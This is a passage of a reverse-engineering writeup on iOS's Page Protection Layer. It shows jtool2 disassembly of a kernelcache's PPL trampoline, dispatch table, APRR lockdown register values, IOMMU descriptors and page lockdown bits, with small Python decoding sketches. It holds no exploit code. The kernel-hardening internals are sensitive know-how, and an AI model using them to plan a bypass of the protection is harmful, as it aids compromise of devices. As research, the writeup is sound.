fffffff0079eee6c 0x17ffd598 B 0xfffffff0079e44cc ; _ppl_enter
_func_fffffff0079eee70:
fffffff0079eee70 0xd280084f MOVZ X15, 0x42 ; R15 = 0x42
fffffff0079eee74 0x17ffd596 B 0xfffffff0079e44cc ; _ppl_enter

And, as we can see, here is the X15 we saw back in __PPLTRAMP! Its value gets loaded, and then a common jump is made to a function at 0xfffffff0079e44cc (already symbolicated as _ppl_enter in the above example). Disassembling a bit before and after will reveal a whole slew of these MOVZ,B,MOVZ,B,MOVZ,B...
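These stubs are trivially machine-decodable. As a quick sanity check - an illustrative standalone sketch, not jtool2 code - the MOVZ immediate and the B target can be recovered from the raw opcodes with a few shifts and masks:

```python
# Minimal ARM64 decoder for the two instruction forms used by the PPL
# stubs: MOVZ Xd, #imm16 (LSL #hw*16) and unconditional B <label>.
# Illustrative only; not part of jtool2.

def decode_movz(opcode):
    """Return (rd, imm) for a 64-bit MOVZ opcode."""
    assert (opcode >> 23) == 0b110100101     # sf=1, opc=10, 100101
    hw = (opcode >> 21) & 0x3                # shift amount, in 16-bit hops
    imm16 = (opcode >> 5) & 0xFFFF
    rd = opcode & 0x1F
    return rd, imm16 << (hw * 16)

def decode_b(opcode, pc):
    """Return the branch target of a B instruction located at pc."""
    assert (opcode >> 26) == 0b000101
    imm26 = opcode & 0x3FFFFFF
    if imm26 & (1 << 25):                    # sign-extend the 26-bit field
        imm26 -= 1 << 26
    return pc + imm26 * 4

# The first stub from the listing above:
rd, imm = decode_movz(0xd280050f)                       # MOVZ X15, 0x28
target = decode_b(0x17ffd59e, 0xfffffff0079eee54)       # -> _ppl_enter
print(rd, hex(imm), hex(target))
```

Running this on the first stub yields register 15, immediate 0x28, and a branch target of 0xfffffff0079e44cc - exactly the _ppl_enter address jtool2 symbolicates.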
Using jtool2's new Gadget Finder (which I just imported from disarm): morpheus@Chimera (~) % jtool2 -G MOVZ,B,MOVZ,B,MOVZ,B,MOVZ,B ~/Downloads/kernelcache.release.iphone11 | grep X15 0x9eacb8: MOVZ X15, 0x0 0x9eacb8: MOVZ X15, 0x1 0x9eacb8: MOVZ X15, 0x2 0x9eacb8: MOVZ X15, 0x3 0x9eacd8: MOVZ X15, 0x6 0x9eacd8: MOVZ X15, 0x7 0x9eacd8: MOVZ X15, 0x8 0x9eacd8: MOVZ X15, 0x9 0x9eacf8: MOVZ X15, 0xa 0x9eacf8: MOVZ X15, 0xb 0x9eacf8: MOVZ X15, 0xc 0x9eacf8: MOVZ X15, 0xd 0x9ead18: MOVZ X15, 0xe 0x9ead18: MOVZ X15, 0xf 0x9ead18: MOVZ X15, 0x11 0x9ead18: MOVZ X15, 0x12 0x9ead38: MOVZ X15, 0x13 0x9ead38: MOVZ X15, 0x14 0x9ead38: MOVZ X15, 0x15 0x9ead38: MOVZ X15, 0x16 0x9ead58: MOVZ X15, 0x17 0x9ead58: MOVZ X15, 0x18 0x9ead58: MOVZ X15, 0x19 0x9ead58: MOVZ X15, 0x1a 0x9ead78: MOVZ X15, 0x1b 0x9ead78: MOVZ X15, 0x1f 0x9ead78: MOVZ X15, 0x20 0x9ead78: MOVZ X15, 0x22 0x9ead98: MOVZ X15, 0x5 0x9ead98: MOVZ X15, 0x10 0x9ead98: MOVZ X15, 0x4 0x9ead98: MOVZ X15, 0x1c 0x9eadb8: MOVZ X15, 0x1d 0x9eadb8: MOVZ X15, 0x1e 0x9eadb8: MOVZ X15, 0x23 0x9eadb8: MOVZ X15, 0x24 0x9eadd8: MOVZ X15, 0x40 0x9eadd8: MOVZ X15, 0x3a 0x9eadd8: MOVZ X15, 0x3b 0x9eadd8: MOVZ X15, 0x3c 0x9eadf8: MOVZ X15, 0x3d 0x9eadf8: MOVZ X15, 0x3e 0x9eadf8: MOVZ X15, 0x3f 0x9eadf8: MOVZ X15, 0x2a 0x9eae18: MOVZ X15, 0x2b 0x9eae18: MOVZ X15, 0x2c 0x9eae18: MOVZ X15, 0x2d 0x9eae18: MOVZ X15, 0x2e 0x9eae38: MOVZ X15, 0x25 0x9eae38: MOVZ X15, 0x26 0x9eae38: MOVZ X15, 0x27 0x9eae38: MOVZ X15, 0x28 0x9eae58: MOVZ X15, 0x29 0x9eae58: MOVZ X15, 0x21 0x9eae58: MOVZ X15, 0x41 0x9eae58: MOVZ X15, 0x42 Naturally, a pattern as obvious as this cannot go unnoticed by the joker module, so if you did run jtool2 --analyze all these MOVZ,B snippets will be properly symbolicated. But now let's look at the common code, _ppl_enter: _ppl_enter: fffffff0079e44cc 0xd503237f PACIBSP ; fffffff0079e44d0 0xa9be57f4 STP X20, X21, [SP, #-32]! 
; fffffff0079e44d4 0xa9017bfd STP X29, X30, [SP, #16] ; fffffff0079e44d8 0x910043fd ADD X29, SP, #16 ; R29 = R31 + 0x10 fffffff0079e44dc 0xd538d08a MRS X10, TPIDR_EL1 ; fffffff0079e44e0 0xb944714c LDR W12, [X10, #1136] ; ...R12 = *(R10 + 1136) = *0x470 fffffff0079e44e4 0x1100058c ADD W12, W12, #1 ; R12 = R12 + 0x1 = 0x471 fffffff0079e44e8 0xb904714c STR W12, [X10, #1136] ; *0x470 = R12 fffffff0079e44ec 0x9000ac6d ADRP X13, 5516 ; R13 = 0xfffffff008f70000 fffffff0079e44f0 0x9101c1ad ADD X13, X13, #112 ; R13 = R13 + 0x70 = 0xfffffff008f70070 fffffff0079e44f4 0xb94001ae LDR W14, [X13, #0] ; ...R14 = *(R13 + 0) = *0xfffffff008f70070 fffffff0079e44f8 0x6b1f01df CMP W14, WZR, ... ; fffffff0079e44fc 0x54000280 B.EQ 0xfffffff0079e454c ; fffffff0079e4500 0x5280000a MOVZ W10, 0x0 ; R10 = 0x0 fffffff0079e4504 0x1455deb7 B 0xfffffff008f5bfe0 ; morpheus@Chimera (~) %jtool2 -a 0xfffffff008f70070 ~/Downloads/kernelcache.release.iphone11 opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 Address 0xfffffff008f70070 (offset 0x1f6c070) is in __PPLDATA.__data morpheus@Chimera (~) %jtool2 -d 0xfffffff008f70070,4 ~/Downloads/kernelcache.release.iphone11 | head -5 opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 Dumping 4 bytes from 0xfffffff008f70070 (Offset 0x1f6c070, __PPLDATA.__data): 0xfffffff008f70070: 00 00 00 00 ..... Hmm. all zeros. Note there was a check for that (in fffffff0079e44fc), which redirected us to 0xfffffff0079e454c. There, we find: _func_fffffff0079e454c: fffffff0079e454c 0xf10111ff CMP X15, #68 ; fffffff0079e4550 0x54000162 B.CS 0xfffffff0079e457c ; fffffff0079e4554 0xb0ffeee9 ADRP X9, 2096605 ; R9 = 0xfffffff0077c1000 fffffff0079e4558 0x913c8129 ADD X9, X9, #3872 ; R9 = R9 + 0xf20 = 0xfffffff0077c1f20 fffffff0079e455c 0xf86f792a -LDR X10, [X9, X15 ...] 
; R0 = 0x0
fffffff0079e4560 0xd63f095f BLRAA X10 ;
fffffff0079e4564 0xaa0003f4 MOV X20, X0 ;
fffffff0079e4568 0x94069378 BL 0xfffffff007b89348 ; __enable_preemption __enable_preemption(ARG0);
fffffff0079e456c 0xaa1403e0 MOV X0, X20 ;
fffffff0079e4570 0xa9417bfd LDP X29, X30, [SP, #0x10] ;
fffffff0079e4574 0xa8c257f4 LDP X20, X21, [SP], #0x20 ;
fffffff0079e4578 0xd65f0fff RETAB ;
fffffff0079e457c 0xa9417bfd LDP X29, X30, [SP, #0x10] ;
fffffff0079e4580 0xa8c257f4 LDP X20, X21, [SP], #0x20 ;
fffffff0079e4584 0xd50323ff AUTIBSP ;
fffffff0079e4588 0xb000ad00 ADRP X0, 5537 ; R0 = 0xfffffff008f85000
fffffff0079e458c 0x91102000 ADD X0, X0, #1032 ; R0 = R0 + 0x408 = 0xfffffff008f85408
fffffff0079e4590 0x14010ff1 B 0xfffffff007a28554 ; _panic _panic ("ppl_dispatch: failed due to bad arguments/state.");

So, again, a check for > 68, on which we'd panic (and we know this function is ppl_dispatch!). Otherwise, a switch-style jump (BLRAA X10 = Branch and Link Authenticated with Key A) to 0xfffffff0077c1f20 - the table we just discussed above.

So what is this 0xfffffff008f70070? An integer, which is likely a boolean, since it gets STR'ed with one. We can call this one _ppl_initialized, or possibly _ppl_locked. You'll have to ask AAPL for the symbol (or wait for iOS 13 β ;-). But I would go for _ppl_locked since there is a clear setting of this value to '1' in _machine_lockdown() (which I have yet to symbolicate in jtool2):

_func_fffffff007b90664:
fffffff007b90664 0xd503237f PACIBSP ;
fffffff007b90668 0xa9bf7bfd STP X29, X30, [SP, #-16]!
; fffffff007b9066c 0x910003fd ADD X29, SP, #0 ; R29 = R31 + 0x0 fffffff007b90670 0x90009f08 ADRP X8, 5088 ; R8 = 0xfffffff008f70000 fffffff007b90674 0x320003e9 ORR W9, WZR, #0x1 ; R9 = 0x1 fffffff007b90678 0xb9007109 STR W9, [X8, #112] ; *0xfffffff008f70070 = R9 = 1 fffffff007b9067c 0x52800000 MOVZ W0, 0x0 ; R0 = 0x0 fffffff007b90680 0x52800001 MOVZ W1, 0x0 ; R1 = 0x0 fffffff007b90684 0x97f979b7 BL 0xfffffff0079eed60 ; _ppl_pmap_return _ppl_pmap_return(0,0); fffffff007b90688 0xa8c17bfd LDP X29, X30, [SP], #0x10 ; fffffff007b9068c 0xd50323ff AUTIBSP ; fffffff007b90690 0x17fffed6 B 0xfffffff007b901e8 ; Therefore, PPL will have been locked by the time _ppl_enter does anything. Meaning it will jump to 0xfffffff008f5bfe0. That's in _PPLTRAMP - right where we started. To save you scrolling up, let's look at this code, piece by piece: fffffff008f5bfe0 0xd53b4234 MRS X20, DAIF ; fffffff008f5bfe4 0xd50347df MSR DAIFSet, #7 ; #(DAIFSC_ASYNC | DAIFSC_IRQF | DAIFSC_FIQF) fffffff008f5bfe8 ---------- *MOVKKKK X14, 0x4455445564666677 ; fffffff008f5bff8 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 ; S3_4_C15_C2_1 fffffff008f5bffc 0xd5033fdf ISB ; fffffff008f5c000 0xd50347df MSR DAIFSet, #7 ; X - 0 0x0 fffffff008f5c004 ---------- *MOVKKKK X14, 0x4455445564666677 fffffff008f5c014 0xd53cf235 MRS X21, ARM64_REG_APRR_EL1 ; S3_4_C15_C2_1 fffffff008f5c018 0xeb1501df CMP X14, X21, ... ; fffffff008f5c01c 0x540005e1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c020 0xf10111ff CMP X15, #68 ; fffffff008f5c024 0x540005a2 B.CS 0xfffffff008f5c0d8 ; ... fffffff008f5c0d8 0xd280004f MOVZ X15, 0x2 ; R15 = 0x2 fffffff008f5c0dc 0xaa1403ea MOV X10, X20 ; fffffff008f5c0e0 0x14001fc3 B 0xfffffff008f63fec ; We start by reading the DAIF, which is the set of SPSR flags holding interrupt state. We then block all interrupts. Next, a load of a rather odd value into S3_4_C15_C2_1, which jtool2 (unlike *cough* certain Rubenesque disassemblers) can correctly identify as a special register - ARM64_REG_APRR_EL1. 
An Instruction Sync Barrier (ISB) follows, and then a check is made that the setting of the register "stuck". If it didn't, or if X15 is over 68 - we go to fffffff008f5c0d8. And you know where that's going, since X15 greater than 68 is an invalid operation. fffffff008f63fec ---------- *MOVKKKK X14, 0x4455445464666477 fffffff008f63ffc 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 fffffff008f64000 0xd5033fdf ISB ; fffffff008f64004 0xf1000dff CMP X15, #3 ; fffffff008f64008 0x54000520 B.EQ 0xfffffff008f640ac ; fffffff008f6400c 0xf27a095f TST X10, #448 ; fffffff008f64010 0x54000140 B.EQ 0xfffffff008f64038 ; fffffff008f64014 0xf27a055f TST X10, #192 ; fffffff008f64018 0x540000c0 B.EQ 0xfffffff008f64030 ; fffffff008f6401c 0xf278015f TST X10, #256 ; fffffff008f64020 0x54000040 B.EQ 0xfffffff008f64028 ; fffffff008f64024 0x14000006 B 0xfffffff008f6403c ; fffffff008f64028 0xd50344ff MSR DAIFClr, #4 ; (DAIF_ASYNC) fffffff008f6402c 0x14000004 B 0xfffffff008f6403c ; fffffff008f64030 0xd50343ff MSR DAIFClr, #3 ; (DAIF_IRQF) fffffff008f64034 0x14000002 B 0xfffffff008f6403c ; fffffff008f64038 0xd50347ff MSR DAIFClr, #7 ; (DAIF_FIQF) fffffff008f6403c 0xf10005ff CMP X15, #1 ; fffffff008f64040 0x54000380 B.EQ 0xfffffff008f640b0 ; fffffff008f64044 0xd538d08a MRS X10, TPIDR_EL1 ; fffffff008f64048 0xb944714c LDR W12, [X10, #1136] ; ...R12 = *(R10 + 1136) = *0x470 fffffff008f6404c 0x3500004c CBNZ X12, 0xfffffff008f64054 ; fffffff008f64050 0x17a9fedb B 0xfffffff0079e3bbc ; The register will be set to another odd value (6477), and then a check will be performed on X15, which won't pass, since we know it was set to 2 back in fffffff008f5c0d8. X10, if you look back, holds the DAIF, because it was moved from X20 (holding the DAIF from back in fffffff008f5bfe0), where X15 was set. This is corroborated by the TST/B.EQ which jump to clear the corresponding DAIF_.. flags. Then, at 0xfffffff008f6403c, another check on X15 - but remember it's 2. So no go. 
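Stepping back to the dispatch itself: ppl_dispatch bounds-checks X15 against 68 and then BLRAAs through an 8-byte pointer table at 0xfffffff0077c1f20 (both values from the listings above). The slot arithmetic is worth spelling out, since it lets you map any stub's X15 to a table entry - a plain back-of-the-envelope sketch:

```python
# Conceptually, ppl_dispatch does:
#   if X15 >= 68: panic("ppl_dispatch: failed due to bad arguments/state.")
#   else:         BLRAA *(0xfffffff0077c1f20 + X15*8)
# This sketch only models the table-index arithmetic.

PPL_TABLE_BASE = 0xfffffff0077c1f20   # from the ADRP/ADD pair in ppl_dispatch
PPL_ROUTINE_COUNT = 68                # from the CMP X15, #68 bound

def ppl_entry_slot(x15):
    """Address of the dispatch-table slot selected for a given X15."""
    if x15 >= PPL_ROUTINE_COUNT:
        raise ValueError("ppl_dispatch: failed due to bad arguments/state.")
    return PPL_TABLE_BASE + x15 * 8

# The AMFI trust-cache wrapper we traced earlier loads X15 = 0x28:
print(hex(ppl_entry_slot(0x28)))
```

This prints 0xfffffff0077c2060 - which, per the service table enumerated later in the article, holds _ppl_pmap_check_static_trust_cache: a fitting target for AMFIIsCodeDirectoryInTrustCache.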
There is a check on the current thread_t (held in TPIDR_EL1) at offset 1136, and if not zero - we'll end up at 0x...79e3bbc which is:

_func_fffffff0079e3bbc:
fffffff0079e3bbc 0xd538d080 MRS X0, TPIDR_EL1 ;
fffffff0079e3bc0 0xf81f0fe0 STR X0, [SP, #496]! ; *0xf80 = R0
fffffff0079e3bc4 0x10000040 ADR X0, #8 ; R0 = 0xfffffff0079e3bcc
fffffff0079e3bc8 0x94011263 BL 0xfffffff007a28554 ; _panic _panic(0xfffffff0079e3bcc);
fffffff0079e3bcc 0x65657250 DCD 0x65657250 ;
fffffff0079e3bd0 0x6974706d LDP W13, W28, [X3, #0x1a0] ;
fffffff0079e3bd4 0x63206e6f DCD 0x63206e6f ;
fffffff0079e3bd8 0x746e756f __2DO 0x746e756f ;
fffffff0079e3bdc 0x67656e20 DCD 0x67656e20 ;
fffffff0079e3be0 0x76697461 __2DO 0x76697461 ;
fffffff0079e3be4 0x6e6f2065 DCD 0x6e6f2065 ;
fffffff0079e3be8 0x72687420 ANDS W0, W1, #50159344557 ;
fffffff0079e3bec 0x20646165 DCD 0x20646165 ;
fffffff0079e3bf0 0x00007025 DCD 0x7025 ;

A call to panic - and, funnily enough, though jtool v1 could show the string, jtool2 can't yet, because it's embedded as data in code. JTOOL2 ISN'T PERFECT, AND, YES, PEDRO, IT MIGHT CRASH ON MALICIOUS BINARIES. But it works superbly well on AAPL binaries, and I don't see Hopper/IDA types getting this far without resorting to scripting and/or Internet symbol databases.. With that disclaimer aside, the panic is:

# jtool v1 cannot do compressed kernel cache, so first you need jtool2
morpheus@Chimera (~) %jtool2 -dec ~/Downloads/kernelcache.release.iphone11
Decompressed kernel written to /tmp/kernel
# Note the use of jtool v1's -dD, forcing dump as data. This will
# eventually make it to jtool2. I just have other things to handle first..
morpheus@Chimera (~) %jtool -dD 0xfffffff0079e3bcc,100 /tmp/kernel
Dumping from address 0xfffffff0079e3bcc (Segment: __TEXT_EXEC.__text)
Address : 0xfffffff0079e3bcc = Offset 0x9dfbcc
0xfffffff0079e3bcc: 50 72 65 65 6d 70 74 69 Preemption count
0xfffffff0079e3bd4: 6f 6e 20 63 6f 75 6e 74 negative on thr
0xfffffff0079e3bdc: 20 6e 65 67 61 74 69 76
Which is the code of _preempt_underflow (from osfmk/arm64/locore.s) so it makes perfect sense. Else, we branch, go through ast_taken_kernel() (func_fffffff007a1e000, and AST are irrelevant for this discussion, and covered in Volume II anyway), and then to the very last snippet of code, which is the familiar error message we had encountered earlier: fffffff008f640a0 0xf10009ff CMP X15, #2 fffffff008f640a4 0x54000080 B.EQ 0xfffffff008f640b4 ; fffffff008f640a8 0xd65f0fff RETAB ; fffffff008f640ac 0xd61f0320 BR X25 ; fffffff008f640b0 0x17ab113a B 0xfffffff007a28598 ; _panic_trap_to_debugger fffffff008f640b4 0xb0000100 ADRP X0, 33 ; R0 = 0xfffffff008f85000 fffffff008f640b8 0x91102000 ADD X0, X0, #1032 ; R0 = R0 + 0x408 = 0xfffffff008f85408 fffffff008f640bc 0x17ab1126 B 0xfffffff007a28554 ; _panic morpheus@Chimera (~) %jtool2 -d 0xfffffff008f85408 ~/Downloads/kernelcache.release.iphone11 0xfffffff008f85408: 70 70 6C 5F 64 69 73 70 ppl_disp 0xfffffff008f85410: 61 74 63 68 3A 20 66 61 atch: fa 0xfffffff008f85418: 69 6C 65 64 20 64 75 65 iled due 0xfffffff008f85420: 20 74 6F 20 62 61 64 20 to bad 0xfffffff008f85428: 61 72 67 75 6D 65 6E 74 argument 0xfffffff008f85430: 73 2F 73 74 61 74 65 00 s/state. ... The APRR Register So what are the references to S3_4_C15_C2_1, a.k.a ARM64_REG_APRR_EL1 ? The following disassembly offers a clue. fffffff0079e30fc 0xd53cf220 MRS X0, ARM64_REG_APRR_EL1 ; fffffff0079e3100 ---------- *MOVKKKK X1, 0x4455445464666477 ; fffffff0079e310c 0xf28c8ee1 MOVK X1, 0x6477 ; R1 += 0x6477 = 0x445544446c049bfb fffffff0079e3110 0xeb01001f CMP X0, X1, ... ; fffffff0079e3114 0x540067e1 B.NE 0xfffffff0079e3e10 ; .. 
_func_fffffff0079e3e10
fffffff0079e3e10 0xa9018fe2 STP X2, X3, [SP, #24] ;
fffffff0079e3e14 0xb000ac61 ADRP X1, 5517 ; R1 = 0xfffffff008f70000
fffffff0079e3e18 0xb9407021 LDR W1, [X1, #112] ; ...R1 = *(R1 + 112) = *0xfffffff008f70070
fffffff0079e3e1c 0xb4000e21 CBZ X1, 0xfffffff0079e3fe0 ;
fffffff0079e3e20 ---------- *MOVKKKK X1, 0x4455445564666677 ;
fffffff0079e3e30 0xeb01001f CMP X0, X1, ... ;
fffffff0079e3e34 0x54000001 B.NE 0xfffffff0079e3e34 ;

We see that the value of the register is read into X0, and compared to 0x4455445464666477. If it doesn't match, a call is made to ..fffffff0079e3e10, which checks the value of our global at 0xfffffff008f70070. If it's 0, we move elsewhere. Otherwise, we check that the register value is 0x4455445564666677 - and if not, we hang (fffffff0079e3e34 branches to itself on not equal). In other words, the value of the 0xfffffff008f70070 global correlates with 0x4455445464666477 and 0x4455445564666677 (I know, confusing, blame AAPL, not me) in ARM64_REG_APRR_EL1 - implying that the register provides the hardware-level lockdown, whereas the global tracks the state.

DARTs, etc

We still haven't looked at the __PPLDATA_CONST.__const. Let's see what it has (removing the companion file so jtool2 doesn't symbolicate and blow the suspense just yet):

(minor note: I had to switch to another machine since my 2016 MBP's keyboard just spontaneously DIED ON ME while doing this. $#%$#%$# device won't boot from a bluetooth keyboard, so after I had to reboot it, I can't get in past the EFI screen till I get a USB keyboard (and hope that works).
I'm using a slightly different kernel, but addresses are largely the same) morpheus@Bifröst (~) % jtool2 -d __PPLDATA_CONST.__const ~/Downloads/kernelcache.release.iphone11 Dumping 192 bytes from 0xfffffff008f68000 (Offset 0x1f64000, __PPLDATA_CONST.__const): 0xfffffff008f68000: 0xfffffff00747542d "ans2_sart" 0xfffffff008f68008: 03 00 01 00 b7 da ad de 0xfffffff008f68010: 0xfffffff008f541cc __func_0xfffffff008f541cc 0xfffffff008f68018: 0xfffffff008f5455c __func_0xfffffff008f5455c 0xfffffff008f68020: 0xfffffff008f54568 __func_0xfffffff008f54568 0xfffffff008f68028: 0xfffffff008f5479c __func_0xfffffff008f5479c 0xfffffff008f68030: 0xfffffff008f54564 __func_0xfffffff008f54564 0xfffffff008f68038: 0xfffffff008f5430c __func_0xfffffff008f5430c 0xfffffff008f68040: 0xfffffff007475813 "t8020dart" 0xfffffff008f68048: 03 00 01 00 b7 da ad de 0xfffffff008f68050: 0xfffffff008f54a14 __func_0xfffffff008f54a14 0xfffffff008f68058: 0xfffffff008f559c8 __func_0xfffffff008f559c8 0xfffffff008f68060: 0xfffffff008f55df0 __func_0xfffffff008f55df0 0xfffffff008f68068: 0xfffffff008f56858 __func_0xfffffff008f56858 0xfffffff008f68070: 0xfffffff008f55dec __func_0xfffffff008f55dec 0xfffffff008f68078: 0xfffffff008f55280 __func_0xfffffff008f55280 0xfffffff008f68080: 0xfffffff007475931 "nvme_ppl" 0xfffffff008f68088: 03 00 01 00 b7 da ad de 0xfffffff008f68090: 0xfffffff008f56978 __func_0xfffffff008f56978 0xfffffff008f68098: 0xfffffff008f5708c __func_0xfffffff008f5708c 0xfffffff008f680a0: 0xfffffff008f57098 __func_0xfffffff008f57098 0xfffffff008f680a8: 0xfffffff008f572e0 __func_0xfffffff008f572e0 0xfffffff008f680b0: 0xfffffff008f57094 __func_0xfffffff008f57094 0xfffffff008f680b8: 0xfffffff008f56df8 __func_0xfffffff008f56df8 We see what appears to be three distinct structs here, identified as "ans2_sart", "t8020dart" and "nvme_ppl". (DART = Device Address Resolution Table). 
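The addresses in the dump (0x...000, 0x...040, 0x...080) suggest a fixed 0x40-byte record: a name pointer, the "03 00 01 00 b7 da ad de" field block, then six function pointers. A speculative parsing sketch - the field names and exact layout are my guesses, not AAPL's:

```python
import struct

# Speculative layout of one __PPLDATA_CONST.__const IOMMU descriptor,
# inferred from the dump above: a name pointer, two u16s, a u32 magic
# (0xdeaddab7), then six function pointers - 0x40 bytes in all.
# Field names are guesses, not AAPL's.
DESC = struct.Struct("<Q2HI6Q")
assert DESC.size == 0x40

def parse_desc(blob):
    name_ptr, a, b, magic, *funcs = DESC.unpack(blob)
    assert magic == 0xdeaddab7, "bad descriptor magic"
    return {"name_ptr": name_ptr, "fields": (a, b), "funcs": funcs}

# Reconstruct the "ans2_sart" entry from the dump and round-trip it:
entry = DESC.pack(0xfffffff00747542d, 3, 1, 0xdeaddab7,
                  0xfffffff008f541cc, 0xfffffff008f5455c,
                  0xfffffff008f54568, 0xfffffff008f5479c,
                  0xfffffff008f54564, 0xfffffff008f5430c)
print(parse_desc(entry)["fields"])
```

Note how the little-endian bytes "b7 da ad de" fall out as the magic 0xdeaddab7, and the two leading shorts as (3, 1) - possibly a version/count pair.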
There are also six function pointers in each, and (right after the structure name) what appears to be three fields - two 16-bit shorts (0x0003, 0x0001) and some magic (0xdeaddab7). It's safe to assume, then, that if we find the symbol names for a function at slot x, corresponding functions for the other structures at the same slot will be similarly named. Looking through panic()s again, we find error messages which show us that 0xfffffff008f541cc is an init(), 0xfffffff008f54568 is a map() operation, and 0xfffffff008f5479c is an unmap(). Some of these calls appear to be no-ops in some cases, and fffffff008f55280 has a switch, which implies it's likely an ioctl() style. Putting it all together, we have:

0xfffffff008f68010: 0xfffffff008f541cc _ans2_sart_init
0xfffffff008f68018: 0xfffffff008f5455c _ans2_unknown1_ret0
0xfffffff008f68020: 0xfffffff008f54568 _ans2_map
0xfffffff008f68028: 0xfffffff008f5479c _ans2_unmap
0xfffffff008f68030: 0xfffffff008f54564 _ans2_sart_unknown2_ret
0xfffffff008f68038: 0xfffffff008f5430c _ans2_sart_ioctl_maybe

which we can then apply to the NVMe and T8020DART. Note these look exactly like the ppl_map_iommu_ioctl* symbols we could obtain from the __TEXT.__cstring, with two unknowns remaining, possibly for allocating and freeing memory. However, looking at __PPLTEXT we find no references to our structures. So we have to look through the kernel's __TEXT_EXEC.__text instead. Using jtool2's disassembly with grep(1) once more, this is easy and quick:

# grep only the prefix fffffff008f680...
since we know that anything in that range
# falls in the __PPLDATA_CONST.__const
Bifröst:Downloads morpheus$ jtool2 -d ~/Downloads/kernelcache.release.iphone11 | grep fffffff008f680
Disassembling 22431976 bytes from address 0xfffffff0079dc000 (offset 0x9d8000):
fffffff007b9e028 0xd0009e40 ADRP X0, 5066 ; R0 = 0xfffffff008f68000
fffffff007b9e02c 0x91000000 ADD X0, X0, #0 ; R0 = R0 + 0x0 = 0xfffffff008f68000
fffffff007b9e034 0xd0009e40 ADRP X0, 5066 ; R0 = 0xfffffff008f68000
fffffff007b9e038 0x91010000 ADD X0, X0, #64 ; R0 = R0 + 0x40 = 0xfffffff008f68040
fffffff007b9e0f0 0xd0009e40 ADRP X0, 5066 ; R0 = 0xfffffff008f68000
fffffff007b9e0f4 0x91020000 ADD X0, X0, #128 ; R0 = R0 + 0x80 = 0xfffffff008f68080

It's safe to assume, then, that the corresponding functions are "...art_get_struct" or something, so I added them to jokerlib as well, though I couldn't offhand find any references to these getters.

Other observations

Pages get locked down by PPL at the Page Table Entry level. There are a few occurrences of code similar to this:

fffffff008f485c4 0xb6d800f3 TBZ X19, #59, 0xfffffff008f485e0 ;
fffffff008f485c8 0x927dfb28 AND X8, X25, #0xfffffffffffffff8 ;
fffffff008f485cc 0xa900efe8 STP X8, X27, [SP, #8] ;
fffffff008f485d0 0xf90003f6 STR X22, [SP, #0] ; *0x0 = R22
fffffff008f485d4 0xb0ff2940 ADRP X0, 2090281 ; R0 = 0xfffffff007471000
fffffff008f485d8 0x910e3800 ADD X0, X0, #910 ; R0 = R0 + 0x38e = 0xfffffff00747138e
fffffff008f485dc 0x97ab7fda BL 0xfffffff007a28544 ; _panic _panic("pmap_page_protect: ppnum 0x%x locked down, cannot be owned by iommu 0x%llx, pve_p=%p");

And this:

fffffff008f482e8 0xf245051f TST X8, #0x180000000000000 ;
fffffff008f482ec 0x540000c0 B.EQ 0xfffffff008f48304 ;
fffffff008f482f0 0x92450d08 AND X8, X8, 0x7800000000000000 ;
fffffff008f482f4 0xa90023f5 STP X21, X8, [SP, #0] ;
fffffff008f482f8 0xb0ff2940 ADRP X0, 2090281 ; R0 = 0xfffffff007471000
fffffff008f482fc 0x910bf400 ADD X0, X0, #765 ; R0 = R0 + 0x2fd = 0xfffffff0074712fd
fffffff008f48300
0x97ab8091 BL 0xfffffff007a28544 ; _panic _panic("%#lx: already locked down/executable (%#llx)");

Which suggests that two bits are used: 59 and 60 - 59 is likely locked down, 60 is executable. @S1guza (who meticulously reviewed this article) notes that these are the PBHA fields - Page-Based Hardware Attribute bits, and they can be IMPLEMENTATION DEFINED.

Takeaways (or TL;DR)

Most people will just run jtool2 --analyze on the kernelcache, then take the symbols and upload them to IDA. This writeup shows you the behind-the-scenes of the analysis, as well as explaining the various PPL facility services.

0xfffffff0077c1f20: 0xfffffff008f52ee4 _ppl_pmap_arm_fast_fault_maybe
0xfffffff0077c1f28: 0xfffffff008f51e4c _ppl_pmap_arm_fast_fault2_maybe
0xfffffff0077c1f30: 0xfffffff008f52a30 _ppl_mapping_free_prime_internal
0xfffffff0077c1f38: 0xfffffff008f525dc _ppl_mapping_replenish_internal
0xfffffff0077c1f40: 0xfffffff008f51c4c _ppl_phys_attribute_clear_internal
0xfffffff0077c1f48: 0xfffffff008f51ba0 _ppl_phys_attribute_set_internal
0xfffffff0077c1f50: 0xfffffff008f518f4 _ppl_batch_set_cache_attributes_internal
0xfffffff0077c1f58: 0xfffffff008f5150c _ppl_pmap_change_wiring_internal
0xfffffff0077c1f60: 0xfffffff008f50994 _ppl_pmap_create_internal
0xfffffff0077c1f68: 0xfffffff008f4f59c _ppl_pmap_destroy_internal
0xfffffff0077c1f70: 0xfffffff008f4de6c _ppl_pmap_enter_options_internal
0xfffffff0077c1f78: 0xfffffff008f4dcac _ppl_pmap_extract_internal
0xfffffff0077c1f80: 0xfffffff008f4dae4 _ppl_pmap_find_phys_internal
0xfffffff0077c1f88: 0xfffffff008f4d7e8 _ppl_pmap_insert_shared_page_internal
0xfffffff0077c1f90: 0xfffffff008f4d58c _ppl_pmap_is_empty_internal
0xfffffff0077c1f98: 0xfffffff008f4d1ec _ppl_map_cpu_windows_copy_internal
0xfffffff0077c1fa0: 0xfffffff008f4cef8 _ppl_pmap_mark_page_as_ppl_page_internal
0xfffffff0077c1fa8: 0xfffffff008f4c038 _ppl_pmap_nest_internal
0xfffffff0077c1fb0: 0xfffffff008f48420 _ppl_pmap_page_protect_options_internal
0xfffffff0077c1fb8:
